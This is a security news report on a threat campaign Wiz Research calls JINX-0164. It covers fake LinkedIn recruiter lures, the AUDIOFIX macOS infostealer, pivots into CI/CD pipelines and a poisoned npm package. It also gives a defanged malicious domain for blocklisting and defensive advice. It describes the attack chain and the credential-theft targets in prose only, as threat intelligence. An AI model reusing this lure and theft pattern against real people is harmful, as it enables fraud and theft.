A new threat actor is raiding crypto firms through fake LinkedIn recruiters and poisoned CI/CD pipelines

A previously unknown threat actor has been systematically targeting cryptocurrency organizations since at least mid-2025, planting custom macOS malware through fake LinkedIn recruiter profiles and using it to move laterally into CI/CD pipelines, steal crypto wallet credentials, and in at least one case execute a supply chain attack. Google-owned cloud security firm Wiz Research disclosed the campaign today, tracking the group under the name JINX-0164.

The attack chain starts with a credible-looking LinkedIn profile posing as a recruiter. The target is invited to a virtual interview via what appears to be a legitimate teleconferencing link — but the domain is fake, designed to mimic real meeting software. When the call "fails to load," the victim is instructed to download a fix. That fix is AUDIOFIX, a Python-based infostealer and remote access trojan that disguises itself as a macOS system audio driver named coreaudiod and is saved to disk as ChromeUpdater.

What AUDIOFIX takes

Once installed, AUDIOFIX harvests an unusually broad set of credentials: passwords stored in password managers, web browser credential stores, iCloud Keychain files, local admin credentials, SSH keys and configuration files, shell history, cryptocurrency wallet addresses and browser extension data, and active session tokens from Discord, Slack, and Telegram. The malware supports manual reconnaissance, arbitrary shell command execution, file deletion, and payload retrieval from attacker-controlled infrastructure — giving JINX-0164 persistent remote access alongside the initial credential theft.

Wiz notes the payload is architecture-aware, compiled for both Intel and Apple Silicon Macs, and is delivered via a fake driver store domain (apple.driver-store[.]com) using a bash script that handles the installation.

CI/CD as a second-stage target

The distinguishing feature of JINX-0164 compared to simpler crypto-targeting malware is its focus on lateral movement into development infrastructure. After compromising an employee's laptop, the group uses AUDIOFIX to pivot to internal code distribution systems, injecting the malware payload into source code repositories. The goal is to reach other developers' machines and, ultimately, compromise the code that handles cryptocurrency transactions — turning a single phishing victim into a supply chain attack affecting all users of a project.

In a separate vector, the group has also distributed MiniRAT, a Go-based backdoor, through a compromised version of @velora-dex/sdk, a legitimate DeFi npm package used for token swaps on the VeloraDEX decentralized exchange. The poisoned package downloaded a shell script from a remote server that delivered the macOS binary via launchctl persistence. SafeDep and StepSecurity documented that specific campaign last month.

North Korean fingerprints

Wiz researchers note that several aspects of the campaign overlap with known North Korean threat clusters, particularly BlueNoroff. These include the use of Astrill VPN during operations, a consistent focus on cryptocurrency firms and developers, and the recruitment-lure social engineering technique that has become a signature of DPRK-linked groups in recent years. Wiz stops short of a definitive attribution but assesses the activity as financially motivated and operationally sophisticated enough to sustain multi-stage intrusions.

The pattern is consistent with a broader North Korean strategy of targeting crypto infrastructure: where ransomware groups typically demand payment after compromising a victim, JINX-0164 aims to compromise the victim's ability to move funds at all — either by stealing wallet credentials directly or by inserting malicious code into the applications that handle crypto transactions.

What crypto and developer teams should watch for

Wiz's disclosure includes indicators of compromise. Organizations should treat unsolicited LinkedIn recruiter outreach followed by video call requests — particularly those involving unexplained technical errors requiring a download — as high-risk interactions. AUDIOFIX uses launchctl persistence, so macOS security tooling that monitors launch daemon registration can detect it. The fake domain pattern (apple.driver-store[.]com and similar) should be added to DNS blocklists.

For development teams, the CI/CD angle is the more serious concern. If any developer in an organization with access to build pipelines is compromised, the downstream blast radius extends to every user of the affected software. Code signing and reproducible builds are partial mitigations; runtime behavioral monitoring of CI/CD jobs is more effective at catching post-compromise lateral movement before a poisoned release ships.